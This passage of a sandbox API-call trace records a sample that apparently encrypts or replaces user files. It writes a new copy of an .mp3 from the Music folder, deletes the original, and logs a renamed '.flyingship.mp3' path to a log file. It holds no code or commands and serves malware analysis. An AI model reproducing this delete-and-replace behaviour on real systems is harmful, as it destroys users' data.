RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.960] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0185.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba0f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.961] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.961] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x1227f, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x1227f, lpOverlapped=0x0) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.963] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.963] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.963] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0185.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.964] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.966] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.966] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.966] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.966] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.966] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFilePart=0x0) returned 0x5f [0185.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x1416fe20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0x90ae18 [0185.968] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\o8lnb5uj.mp3")) returned 1 [0185.977] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x1416fe20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0 [0185.977] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.977] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.978] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.978] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.978] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0185.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.978] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.979] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.980] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.981] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0185.981] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.981] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.982] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0185.982] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x241c, lpOverlapped=0x0) returned 1 [0185.982] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0185.982] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x241c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.982] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\n", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0185.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6d) returned 0x906f38 [0185.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\n", cchWideChar=109, lpMultiByteStr=0x906f38, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 109 [0185.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0185.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0185.983] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6c, lpOverlapped=0x0) returned 1 [0185.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0185.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.983] CloseHandle (hObject=0x138) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0186.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: 